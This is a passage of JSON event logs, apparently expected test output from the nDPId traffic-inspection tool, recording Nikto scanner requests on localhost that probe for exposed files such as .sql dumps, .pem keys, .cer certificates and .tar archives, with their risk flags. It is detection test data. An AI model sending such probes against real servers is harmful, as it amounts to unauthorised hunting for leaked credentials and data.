Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276862,"pkt":"AAAAAAAAAAAAAAAACABFAAC9dyVAAEAGxRN\/AAABfwAAAcJ+H5ApDE8dFFMQVIAYAED+sQAAAQEICp1m+6WdZvulR0VUIC8xLmNlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276862,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276863,"pkt":"AAAAAAAAAAAAAAAACABFAAC9pJxAAEAGl5x\/AAABfwAAAcKAH5APfJymg2qZ5YAYAED+sQAAAQEICp1m+6edZvumR0VUIC8xLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276863,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276864,"pkt":"AAAAAAAAAAAAAAAACABFAADBqoBAAEAGkbR\/AAABfwAAAcKCH5Cxx5I\/tyTjW4AYAED+tQAAAQEICp1m+6idZvuoR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276865,"pkt":"AAAAAAAAAAAAAAAACABFAADBsWVAAEAGis9\/AAABfwAAAcKEH5CGGYkkbARgroAYAED+tQAAAQEICp1m+6mdZvupR0VUIC8xMjcuMC5zcWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276865,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276866,"pkt":"AAAAAAAAAAAAAAAACABFAADBsTlAAEAGivt\/AAABfwAAAcKGH5CzxIl4Ool\/aIAYAED+tQAAAQEICp1m+6qdZvuqR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276869,"pkt":"AAAAAAAAAAAAAAAACABFAADBxdFAAEAGdmN\/AAABfwAAAcKIH5BDzv2PC6KyZoAYAED+tQAAAQEICp1m+6ydZvusR0VUIC8xMjcuMC5wZW0gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276869,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276870,"pkt":"AAAAAAAAAAAAAAAACABFAADAIL1AAEAGG3l\/AAABfwAAAcKKH5D\/Dxj7MLgvIIAYAED+tAAAAQEICp1m+66dZvuuR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276871,"pkt":"AAAAAAAAAAAAAAAACABFAADAmdRAAEAGomF\/AAABfwAAAcKMH5DqwaGU3VMvd4AYAED+tAAAAQEICp1m+6+dZvuvR0VUIC9zaXRlLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276872,"pkt":"AAAAAAAAAAAAAAAACABFAADFFSZAAEAGJwt\/AAABfwAAAcKOH5D96y1nB6jLDIAYAED+uQAAAQEICp1m+7CdZvuwR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276872,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276873,"pkt":"AAAAAAAAAAAAAAAACABFAADFhm9AAEAGtcF\/AAABfwAAAcKQH5BNzL4wefiP1IAYAED+uQAAAQEICp1m+7GdZvuxR0VUIC8xMjcuMC4wLjEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276874,"pkt":"AAAAAAAAAAAAAAAACABFAADCE1BAAEAGKOR\/AAABfwAAAcKSH5DnJisNBZiCk4AYAED+tgAAAQEICp1m+7KdZvuyR0VUIC8xMjcwMDEucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
